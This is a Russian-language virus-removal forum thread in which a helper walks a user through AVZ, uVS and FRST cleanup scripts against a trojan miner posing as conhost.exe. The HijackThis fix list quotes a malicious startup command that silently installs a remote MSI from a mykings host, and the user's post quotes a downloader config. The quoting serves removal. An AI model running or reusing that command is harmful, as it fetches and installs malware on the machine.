Троян, маскирующийся под conhost.exe [HEUR:Trojan.Win32.Generic]

[che_guevara]

Примерно через минуту после загрузки системы появляется процесс conhost.exe, который я вижу в process explorer, но не вижу в диспетчере задач Windows. Сам файл conhost.exe находится в папке C:\Windows\Temp. Одновременно с этим в папке C:\Windows\System32\config\systemprofile\AppData\L ocal\Microsoft\Windows\Temporary Internet Files\Content.IE5 появляется файл 0509.exe с той же хэш-суммой, что и conhost.exe. Файл детектируется на virustotal, как троян с показателем выявления 55 / 68. Также в папке Content.IE5 присутствует текстовый файл со следующим содержимым:
[config]
url=about:blank
exe=hxxp://xxxxxxx/0509.exe
Троян внешне никак себя не проявляет, систему не грузит. Процесс через какое-то время сам закрывается. Сканирование утилитой Dr.Web CureIt! ничего не даёт. Утилита находит эти файлы, удаляет их, но после перезагрузки они появляются вновь.

[Info_bot]

Уважаемый(ая) che_guevara, спасибо за обращение на наш форум!

Удаление вирусов - абсолютно бесплатная услуга на VirusInfo.Info. Хелперы в самое ближайшее время ответят на Ваш запрос. Для оказания помощи необходимо предоставить логи сканирования утилитой Autologger, подробнее можно прочитать в правилах оформления запроса о помощи.

Информация

Если вы хотите получить персональную гарантированную помощь в приоритетном режиме, то воспользуйтесь платным сервисом Помогите+.

Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.

[Vvvyg]

Выполните скрипт в AVZ:

Код:

begin
SearchRootkit(true, true);
SetAVZGuardStatus(True);
 TerminateProcessByName('c:\windows\temp\conhost.exe');
 QuarantineFile('c:\windows\temp\conhost.exe', '');
 DeleteFile('c:\windows\temp\conhost.exe', '');
CreateQurantineArchive(GetAVZDirectory+'quarantine.zip');
BC_ImportDeletedList;
ExecuteSysClean;
 ExecuteWizard('SCU', 3, 3, true);
BC_Activate;
RebootWindows(true);
end.

Компьютер перезагрузится.

В папке с AVZ появится архив карантина quarantine.zip, отправьте этот файл по ссылке "Прислать запрошенный карантин" над над первым сообщением в теме.

Запустите HijackThis, расположенный в папке Autologger и пофиксите (в Windows Vista/7/8/10 необходимо запускать через правую кнопку мыши Запуск от имени администратора)):

Код:

O4 - MSConfig\startupreg: start1 [command] = C:\Windows\system32\msiexec.exe /i http://js.mykings.top:280/helloworld.msi /q (HKLM) (2018/08/24)
O7 - IPSec: Name: win (2017/09/01) - {c5591e78-25e1-4ea7-ac97-85813ec1bbd2} - Source: Any IP - Destination: my IP (Port 135 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2017/09/01) - {c5591e78-25e1-4ea7-ac97-85813ec1bbd2} - Source: Any IP - Destination: my IP (Port 137 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2017/09/01) - {c5591e78-25e1-4ea7-ac97-85813ec1bbd2} - Source: Any IP - Destination: my IP (Port 138 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2017/09/01) - {c5591e78-25e1-4ea7-ac97-85813ec1bbd2} - Source: Any IP - Destination: my IP (Port 139 TCP) (mirrored) - Action: Block
O7 - IPSec: Name: win (2017/09/01) - {c5591e78-25e1-4ea7-ac97-85813ec1bbd2} - Source: Any IP - Destination: my IP (Port 445 TCP) (mirrored) - Action: Block

Установите хотфикс KB4012212, закрывающий опаснейшую уязвимость, которую используют кроме вашего трояна нашумевшие в прошлом году шифровальщики WannaCry и Petya/NotPetya, а также многие майнеры. Иначе не избавитесь от заразы.

Скачайте утилиту Universal Virus Sniffer отсюда и сделайте полный образ автозапуска uVS.

[che_guevara]

Прикрепляю образ автозапуска

[Vvvyg]

Скопируйте скрипт ниже в буфер обмена (выделить и нажать Ctrl-C):

Код:

;uVS v4.0.14 [http://dsrt.dyndns.org]
;Target OS: NTv6.1
v400c
OFFSGNSAVE
zoo %SystemRoot%\TEMP\CONHOST.EXE
addsgn 19E4408D5D6A4C720BD4472E7DC9128E61AFFC7DDDDF1BF2C9E6CD3D95D4714C23EFCCF2EEDCD96C2F8F3B5BD9704632E10C0814860A49A36952A44914CE3890 8 Trojan.BtcMine.2855 [DrWeb] 7

chklst
delvir

delref %SystemRoot%\TEMP\5F76D1A3-D2C4-4AA5-9DC3-665C9EBF80CA
delref %SystemDrive%\USERS\USER\APPDATA\LOCAL\TEMP\WCT8008.TMP
delref WMI_.[BVTFILTER]
apply
deltmp
czoo
restart

Запустите файл start.exe из папки с uVS, выберите "Запустить под текущим пользователем", в главном меню программы - Скрипты -> выполнить скрипт из буфера обмена.
Компьютер перезагрузится.

В папке с uVS появится архив ZIP с именем, начинающимся с ZOO_ и далее из даты и времени, отправьте этот файл по ссылке "Прислать запрошенный карантин" над над первым сообщением в теме.

В папке с UVS будет лог выполнения скрипта, текстовый файл с именем из даты и времени выполнения, прикрепите его с своему сообщению.
Сообщите, что с проблемой.

Загрузите, распакуйте на Рабочий стол и запустите SecurityCheck by glax24 & Severnyj.
Запустите двойным щелчком мыши (если Вы используете Windows XP) или из меню по щелчку правой кнопки мыши Запуск от имени администратора (если Вы используете Windows Vista/7/8/10).
Если увидите предупреждение от фаервола относительно программы SecurityCheck, не блокируйте ее работу.
Дождитесь окончания сканирования, откроется лог в блокноте с именем SecurityCheck.txt;
Если Вы закрыли Блокнот, то найти этот файл можно в корне системного диска в папке с именем SecurityCheck, например C:\SecurityCheck\SecurityCheck.txt.

Приложите этот файл к своему следующему сообщению.

[che_guevara]

После выполнения скрипта и перезагрузки процесс conhost.exe появляется снова. Прилагаю запрошенные логи.

[Vvvyg]

Скачайте Farbar Recovery Scan Tool и сохраните на Рабочем столе.

Примечание: необходимо выбрать версию, совместимую с Вашей операционной системой. Если Вы не уверены, какая версия подойдет для Вашей системы, скачайте обе и попробуйте запустить. Только одна из них запустится на Вашей системе.
Запустите программу. Когда программа запустится, нажмите Yes для соглашения с предупреждением.

Нажмите кнопку Scan.
После окончания сканирования будут созданы отчеты FRST.txt, Addition.txt в той же папке, откуда была запущена программа.
Прикрепите эти файлы к своему следующему сообщению (лучше оба в одном архиве).

[che_guevara]

Выполнено

[Vvvyg]

Откройте Блокнот (Старт =>Программы => Стандартные => Блокнот). Скопируйте в него следующий код:

Код:

CreateRestorePoint:
CloseProcesses:
() C:\Windows\Temp\conhost.exe
C:\Windows\Temp\conhost.exe
2018-08-27 20:36 - 2018-08-27 20:36 - 000390938 _____ C:\unp306867641820152852i-manual.mdmp
2018-08-27 20:36 - 2018-08-27 20:36 - 000389673 _____ C:\unp306867641823272857i-manual.mdmp
2018-08-27 20:36 - 2018-08-27 20:36 - 000384061 _____ C:\unp306867641807828830i-manual.mdmp
2018-08-27 20:36 - 2018-08-27 20:36 - 000382928 _____ C:\unp306867641810012834i-manual.mdmp
2018-08-27 20:36 - 2018-08-27 20:36 - 000381580 _____ C:\unp306867641817500847i-manual.mdmp
2018-08-27 20:36 - 2018-08-27 20:36 - 000377768 _____ C:\unp306867641812040838i-manual.mdmp
2018-08-27 20:35 - 2018-08-27 20:35 - 000384652 _____ C:\unp306867641771480767i-manual.mdmp
2018-08-27 20:35 - 2018-08-27 20:35 - 000384307 _____ C:\unp306867641756348740i-manual.mdmp
2018-08-27 20:35 - 2018-08-27 20:35 - 000383958 _____ C:\unp306867641730452694i-manual.mdmp
2018-08-27 20:35 - 2018-08-27 20:35 - 000381850 _____ C:\unp306867641768828762i-manual.mdmp
2018-08-27 20:35 - 2018-08-27 20:35 - 000381398 _____ C:\unp306867641778344779i-manual.mdmp
2018-08-27 20:35 - 2018-08-27 20:35 - 000381212 _____ C:\unp306867641763056752i-manual.mdmp
2018-08-27 20:35 - 2018-08-27 20:35 - 000380869 _____ C:\unp306867641740124711i-manual.mdmp
2018-08-27 20:35 - 2018-08-27 20:35 - 000379780 _____ C:\unp306867641780684783i-manual.mdmp
2018-08-27 20:35 - 2018-08-27 20:35 - 000379474 _____ C:\unp306867641750264729i-manual.mdmp
2018-08-27 20:35 - 2018-08-27 20:35 - 000361576 _____ C:\unp306867641649644553i-manual.mdmp
Task: {2F41D0F1-B9C5-4D42-AB73-81B6BFDEA06D} - \ok -> No File <==== ATTENTION
Task: {67E802C7-0914-4514-A7E4-13916E68CF08} - no filepath
FirewallRules: [{D7E616B4-2902-4535-83EB-D28678E59CE4}] => (Block) LPort=445
FirewallRules: [{19A2E3EE-30B1-4024-A6A3-78633D56C727}] => (Block) LPort=445
FirewallRules: [{F0E15AD5-D7A9-4B08-BD4C-3FE75D1D878F}] => (Block) LPort=445
FirewallRules: [{F3C17877-2910-425A-B14B-43630D969CF9}] => (Block) LPort=445
FirewallRules: [{A40FC769-C7A6-4D68-8A6B-DBE620876F6C}] => (Block) LPort=445
FirewallRules: [{99B946B5-CDD8-477D-B978-635391948152}] => (Block) LPort=445
FirewallRules: [{F4538793-CC70-4EB0-8EB5-740E30D88105}] => (Block) LPort=445
FirewallRules: [{64E10128-63E8-4275-BB1C-DD3B99F744F8}] => (Block) LPort=445
FirewallRules: [{E58B4451-F570-4B46-B0E2-881F3D831EFB}] => (Block) LPort=445
FirewallRules: [{7695674B-BEAB-4431-B1E3-69D991E0409B}] => (Block) LPort=445
FirewallRules: [{08418E55-E1DD-4569-A023-485DF770FE98}] => (Block) LPort=445
FirewallRules: [{EBD784D5-0725-46B1-A5FD-B947D26F2761}] => (Block) LPort=445
FirewallRules: [{B4750914-2D80-4735-8E4A-DB1E1992BC9E}] => (Block) LPort=445
FirewallRules: [{5DB212C9-E8B1-4F0F-944F-56569EBD2DBA}] => (Block) LPort=445
FirewallRules: [{FC78232D-EADF-48D6-8BAC-B45766049747}] => (Block) LPort=445
Reboot:

и сохраните как fixlist.txt в папку с Farbar Recovery Scan Tool. При сохранении выберите кодировку Юникод!
Отключите до перезагрузки антивирус, закройте все браузеры, в FRST нажмите один раз Fix и подождите. Программа создаст лог-файл (Fixlog.txt). Прикрепите его к своему следующему сообщению.
Компьютер будет перезагружен автоматически.

Скопируйте скрипт из окна "код" ниже в буфер обмена:

Код:

;uVS v4.0.14 [http://dsrt.dyndns.org]
;Target OS: NTv6.1
v400c
sreg
delall %SystemRoot%\TEMP\CONHOST.EXE
delref WMI_.[BVTFILTER]
areg
apply

Закройте все программы, запустите командный файл script.cmd из папки с UVS. Когда откроется окно со скриптом, нажмите "Выполнить".
Компьютер перезагрузится.

Новый лог выполнения скрипта прикрепите.

[che_guevara]

Выполнено

[Vvvyg]

Скачайте и запустите TDSSKiller: http://support.kaspersky.ru/viruses/disinfection/5350.
Файл C:\TDSSKiller.***_log.txt приложите в теме (лучше в архиве) где *** - версия программы, дата и время запуска.)

[che_guevara]

TDSSKiller ничего подозрительного не обнаруживает

[Vvvyg]

Проблема сохраняется?
Проверьте уязвимость через ETERNAL BLUES. Если найдена на этом компьютере - отключите протокол SMB версии 1.

[che_guevara]

Уязвимость не найдена, проблема сохраняется.

[Vvvyg]

Сделайте лог сканирования МВАМ.

[che_guevara]

Обнаруживается всё тот же conhost.exe в папке temp

[Vvvyg]

Выполните скрипт в UVS:

Код:

;uVS v4.0.14 [http://dsrt.dyndns.org]
;Target OS: NTv6.1
v400c
OFFSGNSAVE
addsgn 19E4408D5D6A4C720BD4472E7DC9128E61AFFC7DDDDF1BF2C9E6CD3D95D4714C23EFCCF2EEDCD96C2F8F3B5BD9704632E10C0814860A49A36952A44914CE3890 8 Trojan.BtcMine.2855 [DrWeb] 7

chklst
delvir

delref %SystemDrive%\PROGRAM FILES\IOBIT\IOBIT UNINSTALLER\UNINSTALER_SKIPUAC.EXE
zoo %Sys32%\TASKS\HPWEBREG.EXE
delall %Sys32%\TASKS\HPWEBREG.EXE
czoo
restart

В папке с uVS появится архив ZIP с именем, начинающимся с ZOO_ и далее из даты и времени, отправьте этот файл по ссылке "Прислать запрошенный карантин" над над первым сообщением в теме.

В папке с UVS будет лог выполнения скрипта, текстовый файл с именем из даты и времени выполнения, прикрепите его с своему сообщению.

Запустите AutorunsVTchecker, дождитесь окончания его работы.

Сделайте новый полный образ автозапуска uVS, загрузите в доступное облачное хранилище или на файлообменник (rghost.ru, например) и дайте ссылку.

[che_guevara]

Сделано:
https://yadi.sk/d/exE5jGlL3aeG9k

[Vvvyg]

Сделайте новый полный образ автозапуска uVS в безопасном режиме загрузки системы. Что-то хорошо маскируется, CONHOST.EXE даже не в автозагрузке...

[che_guevara]

Похоже, гораздо быстрее можно было бы решить проблему, просто переустановив систему. Но теперь, когда уже потрачено столько времени, хочется докопаться до истины ))
Сделал образ в безопасном режиме: https://yadi.sk/d/q3D9wm5d3aefC7